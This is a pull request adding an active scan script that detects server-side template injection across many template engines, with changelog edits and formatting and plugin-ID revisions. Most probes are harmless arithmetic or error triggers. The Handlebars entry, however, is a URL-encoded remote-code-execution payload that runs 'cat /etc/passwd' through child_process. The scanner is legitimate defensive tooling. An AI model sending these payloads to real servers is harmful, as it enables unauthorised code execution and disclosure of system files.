### PR TITLE
[Scanner Rule] Server Side Template Injection

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 ### Added
 - active/RCE.py
 - active/SSTI.py
+- active/SSTI.js - An active script to check for SSTI in 14 different template engines.
 
 ### Changed
 - standalone/enableDebugLogging.js > Updated for more recent logging funtionality.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,7 +7,7 @@ The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 ### Added
 - active/RCE.py
 - active/SSTI.py
-- active/SSTI.js - An active script to check for SSTI in 14 different template engines.
+- active/SSTI.js - An active scan script to check for SSTI in 14 different template engines.
 
 ### Changed
 - standalone/enableDebugLogging.js > Updated for more recent logging funtionality.

--- a/active/SSTI.js
+++ b/active/SSTI.js
@@ -15,219 +15,180 @@ var log = LoggerManager.getLogger("SSTI");
 var HashMap = Java.type('java.util.HashMap');
 
 function logger() {
-	print("[" + this["zap.script.name"] + "] " + arguments[0]);
-	log.debug("[" + this["zap.script.name"] + "] " + arguments[0]);
+    print("[" + this["zap.script.name"] + "] " + arguments[0]);
+    log.debug("[" + this["zap.script.name"] + "] " + arguments[0]);
 }
 
-/**
- * Scans a specific parameter in an HTTP message.
- * The scan function will typically be called for every parameter in every URL and Form for every page.
- * 
- * @param as - the ActiveScan parent object that will do all the core interface tasks 
- *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
- *     raising alerts, etc.). This is an ScriptsActiveScanner object.
- * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
- * @param {string} param - the name of the parameter being manipulated for this test/scan.
- * @param {string} value - the original parameter value.
- */
 function scan(as, msg, param, value) {
-	// Debugging can be done using println like this
-	logger('scan called for url=' + msg.getRequestHeader().getURI().toString() +
-		' param=' + param + ' value=' + value);
 
-	// Copy requests before reusing them
-	var sstiFuzzMessage = msg.cloneRequest();
+    logger('scan called for url=' + msg.getRequestHeader().getURI().toString() +
+        ' param=' + param + ' value=' + value);
 
-	// Check if the scan was stopped before performing lengthy tasks
-	if (as.isStop()) {
-		return;
-	}
+    // Copy requests before reusing them
+    var sstiFuzzMessage = msg.cloneRequest();
 
-	// Fuzz for SSTI and detect template engine in use by inducing errors
-	sstiFuzzEngineErrorDetect(as, sstiFuzzMessage, param);
+    // Check if the scan was stopped before performing lengthy tasks
+    if (as.isStop()) {
+        return;
+    }
 
-	// Fuzz for SSTI and detect template engine in use by evaluating an expression
-	sstiFuzzEngineMathDetect(as, sstiFuzzMessage, param);
+    // Fuzz for SSTI and detect template engine in use by inducing errors
+    sstiFuzzEngineErrorDetect(as, sstiFuzzMessage, param);
+
+    // Fuzz for SSTI and detect template engine in use by evaluating an expression
+    sstiFuzzEngineMathDetect(as, sstiFuzzMessage, param);
 }
 
-/**
- * 
- * @param {ActiveScan parent object} as 
- * @param {HTTP Message Object} msg 
- * @param {String} param 
- * @returns void
- */
 function sstiFuzzEngineErrorDetect(as, msg, param) {
 
-	logger("SSTI Error Based Engine Detection Started...");
+    logger("SSTI Error Based Engine Detection Started...");
 
-	// Attacks for generating errors to detect the template engine being used
-	// We are using two types of errors mostly, because sometimes some types of errors are handled without output
-	// a) Undeclared variable
-	// b) Division by zero
-	var errorGenerateAttacks = [
-		"<%= foobar %>", // ruby erb
-		"<%= 7/0 %>", // ruby erb
-		"{{1/0}}", // tornado / handlebars / twig / django
-		"{{foobar}}", // tornado / twig
-		"{{ errorProduce(sumthin) }}", // twig
-		"${foobar}", // freemarker
-		"${7/0}", // freemarker
-		"{#foobar}", // dust
-		"#{foobar}", // ruby slim
-		"#{7/0}", //ruby slim
-		"{% foobar %}", // django
-		'#include( "nonone.txt" )', // velocity
-		"${{<%[%'\"}}%\." // SSTI polyglot
-	];
+    // Attacks for generating errors to detect the template engine being used
+    // We are using two types of errors mostly, because sometimes some types of errors are handled without output
+    // a) Undeclared variable
+    // b) Division by zero
+    var errorGenerateAttacks = [
+        "<%= foobar %>", // ruby erb
+        "<%= 7/0 %>", // ruby erb
+        "{{1/0}}", // tornado / handlebars / twig / django
+        "{{foobar}}", // tornado / twig
+        "{{ errorProduce(sumthin) }}", // twig
+        "${foobar}", // freemarker
+        "${7/0}", // freemarker
+        "{#foobar}", // dust
+        "#{foobar}", // ruby slim
+        "#{7/0}", //ruby slim
+        "{% foobar %}", // django
+        '#include( "nonone.txt" )', // velocity
+        "${{<%[%'\"}}%\." // SSTI polyglot
+    ];
 
-	for (var i = 0; i < errorGenerateAttacks.length; i++) {
+    for (var i = 0; i < errorGenerateAttacks.length; i++) {
 
-		var err = errorGenerateAttacks[i];
+        var err = errorGenerateAttacks[i];
 
-		// Copy requests before reusing them
-		var fuzzMsg = msg.cloneRequest();
+        // Copy requests before reusing them
+        var fuzzMsg = msg.cloneRequest();
 
-		// setParam (message, parameterName, newValue)
-		as.setParam(fuzzMsg, param, err);
+        // setParam (message, parameterName, newValue)
+        as.setParam(fuzzMsg, param, err);
 
-		// sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
-		as.sendAndReceive(fuzzMsg, false, false);
-		var respBody = fuzzMsg.getResponseBody().toString();
+        // sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+        as.sendAndReceive(fuzzMsg, false, false);
+        var respBody = fuzzMsg.getResponseBody().toString();
 
-		// Possible template engines
-		var templateEngines = ["jinja", "django", "tornado", "erb", "freemarker", "handlebars", "velocity", "twig", "dot", "dust", "smarty", "mako", "Slim", "ejs", "Infinity", "INF"];
+        // Possible template engines
+        var templateEngines = ["jinja", "django", "tornado", "erb", "freemarker", "handlebars", "velocity", "twig", "dot", "dust", "smarty", "mako", "Slim", "ejs", "Infinity", "INF"];
 
-		for (var j = 0; j < templateEngines.length; j++) {
+        for (var j = 0; j < templateEngines.length; j++) {
 
-			var engine = templateEngines[j];
-			if (respBody.includes(engine)) {
+            var engine = templateEngines[j];
+            if (respBody.includes(engine)) {
 
-				logger("Server Side Template Injection Found! Raising Alert...");
-				raiseAlert(as, fuzzMsg, err, engine, 2, param, engine);
-				logger("SSTI Error Based Engine Detection Completed...");
-				return;
-			}
-		}
-	}
+                logger("Server Side Template Injection Found! Raising Alert...");
+                raiseAlert(as, fuzzMsg, err, engine, 2, param, engine);
+                logger("SSTI Error Based Engine Detection Completed...");
+                return;
+            }
+        }
+    }
 
-	logger("SSTI Error Based Engine Detection Completed...");
+    logger("SSTI Error Based Engine Detection Completed...");
 }
 
-/**
- * 
- * @param {ActiveScan Object} as 
- * @param {HttpMessage Object} msg 
- * @param {String} param 
- * @returns void
- */
 function sstiFuzzEngineMathDetect(as, msg, param) {
 
-	logger("SSTI Expression Evaluation Based Engine Detection Started...");
+    logger("SSTI Expression Evaluation Based Engine Detection Started...");
 
-	// Attacks for injecting an expression and checking the response to see if it got evaluated
-	var equationExecuteAttacks = {
-		"ERB/EJS": ["<%= 9*1371742 %>", "12345678"], // outputs 12345678
-		"Jinja2": ["{{8*'7'}}", "77777777"], // Outputs 77777777
-		"Smarty": ["{9*1371742}", "12345678"], // Outputs 12345678
-		"Tornado/Twig/Nunjucks/Vue.js/Smarty": ["{{9*1371742}}", "12345678"], //outputs 12345678
-		"Freemarker": ["${9*1371742}", "12,345,678"], // Outputs 12,345,678
-		"Mako": ["${9*1371742}", "12345678"], // Outputs 12345678 
-		"Handlebars": ["%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%3b%22%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d", "/bin/bash"], // Check for /bin/bash in output
-		"velocity": ["#set ($run=9*1371742) $run", "12345678"], // outputs 12345678
-		"Velocity": ["#{set} ($run=9*1371742) $run", "12345678"], // In case 'set' is blacklisted in velocity circumvent like this, outputs 12345678
-		"django": ["{% widthratio 9 1 1371742 %}", "12345678"], // outputs 12345678
-		"Django": ["{% debug %}", "django"], // Check output for "django"
-		"Dot": ["{{=9*1371742}}", "12345678"], //Outputs 12345678
-		"Dust": ['{@math key="9" method="multiply" operand="1371742"/}', "12345678"], // Outputs 12345678
-		"Slim/Jade": ["#{9*1371742}", "12345678"], // Outputs 12345678
-	};
+    // Attacks for injecting an expression and checking the response to see if it got evaluated
+    var equationExecuteAttacks = {
+        "ERB/EJS": ["<%= 9*1371742 %>", "12345678"], // outputs 12345678
+        "Jinja2": ["{{8*'7'}}", "77777777"], // Outputs 77777777
+        "Smarty": ["{9*1371742}", "12345678"], // Outputs 12345678
+        "Tornado/Twig/Nunjucks/Vue.js/Smarty": ["{{9*1371742}}", "12345678"], //outputs 12345678
+        "Freemarker": ["${9*1371742}", "12,345,678"], // Outputs 12,345,678
+        "Mako": ["${9*1371742}", "12345678"], // Outputs 12345678 
+        "Handlebars": ["%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%3b%22%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d", "/bin/bash"], // Check for /bin/bash in output
+        "velocity": ["#set ($run=9*1371742) $run", "12345678"], // outputs 12345678
+        "Velocity": ["#{set} ($run=9*1371742) $run", "12345678"], // In case 'set' is blacklisted in velocity circumvent like this, outputs 12345678
+        "django": ["{% widthratio 9 1 1371742 %}", "12345678"], // outputs 12345678
+        "Django": ["{% debug %}", "django"], // Check output for "django"
+        "Dot": ["{{=9*1371742}}", "12345678"], //Outputs 12345678
+        "Dust": ['{@math key="9" method="multiply" operand="1371742"/}', "12345678"], // Outputs 12345678
+        "Slim/Jade": ["#{9*1371742}", "12345678"], // Outputs 12345678
+    };
 
-	for (var i in equationExecuteAttacks) {
+    for (var i in equationExecuteAttacks) {
 
-		// Copy requests before reusing them
-		var fuzzMsg = msg.cloneRequest();
+        // Copy requests before reusing them
+        var fuzzMsg = msg.cloneRequest();
 
-		// Set payload and evidence
-		var payload = equationExecuteAttacks[i][0];
-		var evidence = equationExecuteAttacks[i][1];
+        // Set payload and evidence
+        var payload = equationExecuteAttacks[i][0];
+        var evidence = equationExecuteAttacks[i][1];
 
-		// setParam (message, parameterName, newValue)
-		as.setParam(fuzzMsg, param, payload);
+        // setParam (message, parameterName, newValue)
+        as.setParam(fuzzMsg, param, payload);
 
-		// sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
-		as.sendAndReceive(fuzzMsg, false, false);
-		var respBody = fuzzMsg.getResponseBody().toString();
+        // sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+        as.sendAndReceive(fuzzMsg, false, false);
+        var respBody = fuzzMsg.getResponseBody().toString();
 
-		if (respBody.includes(evidence)) {
+        if (respBody.includes(evidence)) {
 
-			logger("Server Side Template Injection Found! Raising Alert...");
-			raiseAlert(as, fuzzMsg, payload, evidence, 3, param, i);
-			logger("SSTI Expression Evaluation Based Engine Detection Completed...");
-			return;
-		}
-	}
+            logger("Server Side Template Injection Found! Raising Alert...");
+            raiseAlert(as, fuzzMsg, payload, evidence, 3, param, i);
+            logger("SSTI Expression Evaluation Based Engine Detection Completed...");
+            return;
+        }
+    }
 
-	logger("SSTI Expression Evaluation Based Engine Detection Completed...");
+    logger("SSTI Expression Evaluation Based Engine Detection Completed...");
 }
 
-/**
- * 
- * @param {ActiveScan parent object} as 
- * @param {HTTP Message Object} msg 
- * @param {String} payload 
- * @param {String} evidence 
- * @param {Integer} confidence
- * @param {String} param
- */
 function raiseAlert(as, msg, payload, evidence, confidence, param, engine) {
 
-	var badErrors = ["Infinity", "INF"];
+    var badErrors = ["Infinity", "INF"];
 
-	//Alert variables
-	var pluginId = 1204650;
-	var alertName = "Server Side Template Injection";
-	if (!badErrors.includes(engine)) {
-		alertName += " - " + toTitleCase(engine);
-	}
-	var alertDesc = "Server Side Template Injection (SSTI) occurs when user input is directly embedded into the template without any proper sanitization, a hacker can use this vulnerability to inject malicious code and try to achieve remote code execution.";
-	var alertSol = "Always use proper functions provided by the template engine to insert data, if that is not possible try to sanitize user input as efficiently as possible.";
-	var alertRef = "https://portswigger.net/research/server-side-template-injection";
-	var cweId = 20; // Improper Input Validation
-	var wascId = 20; // Improper Input Handling
-	var alertTags = new HashMap();
-	alertTags.put("OWASP_2021_A03", "https://owasp.org/Top10/A03_2021-Injection/");
-	alertTags.put("OWASP_2017_A01", "https://owasp.org/www-project-top-ten/2017/A1_2017-Injection.html");
+    //Alert variables
+    var pluginId = 1204650;
+    var alertName = "Server Side Template Injection";
+    if (!badErrors.includes(engine)) {
+        alertName += " - " + toTitleCase(engine);
+    }
+    var alertDesc = "Server Side Template Injection (SSTI) occurs when user input is directly embedded into the template without any proper sanitization, a hacker can use this vulnerability to inject malicious code and try to achieve remote code execution.";
+    var alertSol = "Always use proper functions provided by the template engine to insert data, if that is not possible try to sanitize user input as efficiently as possible.";
+    var alertRef = "https://portswigger.net/research/server-side-template-injection";
+    var cweId = 20; // Improper Input Validation
+    var wascId = 20; // Improper Input Handling
+    var alertTags = new HashMap();
+    alertTags.put("OWASP_2021_A03", "https://owasp.org/Top10/A03_2021-Injection/");
+    alertTags.put("OWASP_2017_A01", "https://owasp.org/www-project-top-ten/2017/A1_2017-Injection.html");
 
 
-	as.newAlert()
-		.setAlertId(pluginId)
-		.setRisk(3)
-		.setConfidence(confidence)
-		.setName(alertName)
-		.setDescription(alertDesc)
-		.setParam(param)
-		.setAttack(payload)
-		.setEvidence(evidence)
-		.setSolution(alertSol)
-		.setReference(alertRef)
-		.setCweId(cweId)
-		.setWascId(wascId)
-		.setMessage(msg)
-		.setTags(alertTags)
-		.raise();
+    as.newAlert()
+        .setAlertId(pluginId)
+        .setRisk(3)
+        .setConfidence(confidence)
+        .setName(alertName)
+        .setDescription(alertDesc)
+        .setParam(param)
+        .setAttack(payload)
+        .setEvidence(evidence)
+        .setSolution(alertSol)
+        .setReference(alertRef)
+        .setCweId(cweId)
+        .setWascId(wascId)
+        .setMessage(msg)
+        .setTags(alertTags)
+        .raise();
 }
 
-/**
- * 
- * @param {String} str 
- * @returns {String}
- */
 function toTitleCase(str) {
-	return str.replace(
-		/\w\S*/g,
-		function(txt) {
-			return txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase();
-		}
-	);
+    return str.replace(
+        /\w\S*/g,
+        function(txt) {
+            return txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase();
+        }
+    );
 }

--- a/active/SSTI.js
+++ b/active/SSTI.js
@@ -151,7 +151,7 @@ function raiseAlert(as, msg, payload, evidence, confidence, param, engine) {
     var badErrors = ["Infinity", "INF"];
 
     //Alert variables
-    var pluginId = 1204650;
+    var pluginId = 100033;
     var alertName = "Server Side Template Injection";
     if (!badErrors.includes(engine)) {
         alertName += " - " + toTitleCase(engine);

--- a/active/SSTI.js
+++ b/active/SSTI.js
@@ -1,0 +1,230 @@
+/**
+ * Made with ❤️ by Astra Security (https://www.getastra.com/)
+ * @author: Karthik UJ (karthik.uj@getastra.com)
+ * Version: 1.0
+ */
+
+// Labs: https://portswigger.net/web-security/all-labs#server-side-template-injection
+// More simple web apps made with SSTI vulnerable template engines: https://github.com/DiogoMRSilva/websitesVulnerableToSSTI
+
+// Import Logger
+var LoggerManager = Java.type("org.apache.logging.log4j.LogManager");
+var log = LoggerManager.getLogger("SSTI");
+
+// HasMap for alertTags
+var HashMap = Java.type('java.util.HashMap');
+
+function logger() {
+	print("[" + this["zap.script.name"] + "] " + arguments[0]);
+	log.debug("[" + this["zap.script.name"] + "] " + arguments[0]);
+}
+
+/**
+ * Scans a specific parameter in an HTTP message.
+ * The scan function will typically be called for every parameter in every URL and Form for every page.
+ * 
+ * @param as - the ActiveScan parent object that will do all the core interface tasks 
+ *     (i.e.: sending and receiving messages, providing access to Strength and Threshold settings,
+ *     raising alerts, etc.). This is an ScriptsActiveScanner object.
+ * @param msg - the HTTP Message being scanned. This is an HttpMessage object.
+ * @param {string} param - the name of the parameter being manipulated for this test/scan.
+ * @param {string} value - the original parameter value.
+ */
+function scan(as, msg, param, value) {
+	// Debugging can be done using println like this
+	logger('scan called for url=' + msg.getRequestHeader().getURI().toString() + 
+		' param=' + param + ' value=' + value);
+	
+	// Copy requests before reusing them
+	var sstiFuzzMessage = msg.cloneRequest();
+
+	// Check if the scan was stopped before performing lengthy tasks
+	if (as.isStop()) {
+		return
+	}
+
+    // Fuzz for SSTI and detect template engine in use by inducing errors
+    sstiFuzzEngineErrorDetect(as, sstiFuzzMessage, param);
+
+	// Fuzz for SSTI and detect template engine in use by evaluating an expression
+	sstiFuzzEngineMathDetect(as, sstiFuzzMessage, param);
+}
+
+/**
+ * 
+ * @param {ActiveScan parent object} as 
+ * @param {HTTP Message Object} msg 
+ * @param {String} param 
+ * @returns void
+ */
+function sstiFuzzEngineErrorDetect(as, msg, param) {
+
+	logger("SSTI Error Based Engine Detection Started...");
+    
+    // Attacks for generating errors to detect the template engine being used
+	// We are using two types of errors mostly, because sometimes some types of errors are handled without output
+		// a) Undeclared variable
+		// b) Division by zero
+    var errorGenerateAttacks = [
+		"<%= foobar %>", // ruby erb
+		"<%= 7/0 %>", // ruby erb
+		"{{1/0}}", // tornado / handlebars / twig / django
+		"{{foobar}}", // tornado / twig
+		"{{ errorProduce(sumthin) }}", // twig
+		"${foobar}", // freemarker
+		"${7/0}", // freemarker
+		"{#foobar}", // dust
+		"#{foobar}", // ruby slim
+		"#{7/0}", //ruby slim
+		"{% foobar %}", // django
+		'#include( "nonone.txt" )', // velocity
+		"${{<%[%'\"}}%\." // SSTI polyglot
+	];
+
+	for (const err of errorGenerateAttacks) {
+
+		// Copy requests before reusing them
+		var fuzzMsg = msg.cloneRequest();
+
+		// setParam (message, parameterName, newValue)
+		as.setParam(fuzzMsg, param, err);
+
+		// sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+		as.sendAndReceive(fuzzMsg, false, false);
+		var respBody = fuzzMsg.getResponseBody().toString();
+
+		// Possible template engines
+		var templateEngines = ["jinja", "django", "tornado", "erb", "freemarker", "handlebars", "velocity", "twig", "dot", "dust", "smarty", "mako", "Slim", "ejs", "Infinity", "INF"];
+
+		for (const engine of templateEngines) {
+
+			if (respBody.includes(engine)) {
+				
+				logger("Server Side Template Injection Found! Raising Alert...");
+				raiseAlert(as, fuzzMsg, err, engine, 2, param, engine);
+				logger("SSTI Error Based Engine Detection Completed...");
+				return;
+			}
+		}
+	}
+
+	logger("SSTI Error Based Engine Detection Completed...");
+}
+
+/**
+ * 
+ * @param {ActiveScan Object} as 
+ * @param {HttpMessage Object} msg 
+ * @param {String} param 
+ * @returns void
+ */
+function sstiFuzzEngineMathDetect(as, msg, param) {
+
+	logger("SSTI Expression Evaluation Based Engine Detection Started...");
+	
+	// Attacks for injecting an expression and checking the response to see if it got evaluated
+	var equationExecuteAttacks = {
+		"ERB/EJS":["<%= 9*1371742 %>", "12345678"], // outputs 12345678
+		"Jinja2":["{{8*'7'}}", "77777777"], // Outputs 77777777
+		"Smarty":["{9*1371742}", "12345678"], // Outputs 12345678
+		"Tornado/Twig/Nunjucks/Vue.js/Smarty":["{{9*1371742}}", "12345678"], //outputs 12345678
+		"Freemarker":["${9*1371742}", "12,345,678"], // Outputs 12,345,678
+		"Mako":["${9*1371742}", "12345678"], // Outputs 12345678 
+		"Handlebars":["%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%20%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%27%29%3b%22%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0a%20%20%20%20%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d", "/bin/bash"], // Check for /bin/bash in output
+		"Velocity":["#set ($run=9*1371742) $run", "12345678"], // outputs 12345678
+		"Velocity":["#{set} ($run=9*1371742) $run", "12345678"], // In case 'set' is blacklisted in velocity circumvent like this, outputs 12345678
+		"Django":["{% widthratio 9 1 1371742 %}", "12345678"], // outputs 12345678
+		"Django":["{% debug %}", "django"], // Check output for "django"
+		"Dot":["{{=9*1371742}}", "12345678"], //Outputs 12345678
+		"Dust":['{@math key="9" method="multiply" operand="1371742"/}', "12345678"], // Outputs 12345678
+		"Slim/Jade":["#{9*1371742}", "12345678"], // Outputs 12345678
+	};
+
+	for(var i in equationExecuteAttacks) {
+
+		// Copy requests before reusing them
+		var fuzzMsg = msg.cloneRequest();
+
+		// Set payload and evidence
+		payload = equationExecuteAttacks[i][0];
+		evidence = equationExecuteAttacks[i][1];
+
+		// setParam (message, parameterName, newValue)
+		as.setParam(fuzzMsg, param, payload);
+
+		// sendAndReceive(msg, followRedirect, handleAntiCSRFtoken)
+		as.sendAndReceive(fuzzMsg, false, false);
+		var respBody = fuzzMsg.getResponseBody().toString();
+
+		if (respBody.includes(evidence)) {
+			
+			logger("Server Side Template Injection Found! Raising Alert...");
+			raiseAlert(as, fuzzMsg, payload, evidence, 3, param, i);
+			logger("SSTI Expression Evaluation Based Engine Detection Completed...");
+			return;
+		}
+	}
+
+	logger("SSTI Expression Evaluation Based Engine Detection Completed...");
+}
+
+/**
+ * 
+ * @param {ActiveScan parent object} as 
+ * @param {HTTP Message Object} msg 
+ * @param {String} payload 
+ * @param {String} evidence 
+ * @param {Integer} confidence
+ * @param {String} param
+ */
+function raiseAlert(as, msg, payload, evidence, confidence, param, engine) {
+
+	badErrors = ["Infinity", "INF"];
+
+	//Alert variables
+	var pluginId = 1204650;
+	var alertName = "Server Side Template Injection";
+	if (!badErrors.includes(engine)) {
+		alertName += " - " + toTitleCase(engine);
+	}
+	var alertDesc = "Server Side Template Injection (SSTI) occurs when user input is directly embedded into the template without any proper sanitization, a hacker can use this vulnerability to inject malicious code and try to achieve remote code execution.";
+	var alertSol = "Always use proper functions provided by the template engine to insert data, if that is not possible try to sanitize user input as efficiently as possible.";
+	var alertRef = "https://portswigger.net/research/server-side-template-injection";
+	var cweId = 20; // Improper Input Validation
+	var wascId = 20; // Improper Input Handling
+	var alertTags = new HashMap();
+	alertTags.put("OWASP_2021_A03", "https://owasp.org/Top10/A03_2021-Injection/");
+	alertTags.put("OWASP_2017_A01", "https://owasp.org/www-project-top-ten/2017/A1_2017-Injection.html");
+
+
+	as.newAlert()
+		.setAlertId(pluginId)
+		.setRisk(3)
+		.setConfidence(confidence)
+		.setName(alertName)
+		.setDescription(alertDesc)
+		.setParam(param)
+		.setAttack(payload)
+		.setEvidence(evidence)
+		.setSolution(alertSol)
+		.setReference(alertRef)
+		.setCweId(cweId)
+		.setWascId(wascId)
+		.setMessage(msg)
+		.setTags(alertTags)
+		.raise();
+}
+
+/**
+ * 
+ * @param {String} str 
+ * @returns {String}
+ */
+function toTitleCase(str) {
+	return str.replace(
+	  /\w\S*/g,
+	  function(txt) {
+		return txt.charAt(0).toUpperCase() + txt.substr(1).toLowerCase();
+	  }
+	);
+}

--- a/active/SSTI.js
+++ b/active/SSTI.js
@@ -32,19 +32,19 @@ function logger() {
  */
 function scan(as, msg, param, value) {
 	// Debugging can be done using println like this
-	logger('scan called for url=' + msg.getRequestHeader().getURI().toString() + 
+	logger('scan called for url=' + msg.getRequestHeader().getURI().toString() +
 		' param=' + param + ' value=' + value);
-	
+
 	// Copy requests before reusing them
 	var sstiFuzzMessage = msg.cloneRequest();
 
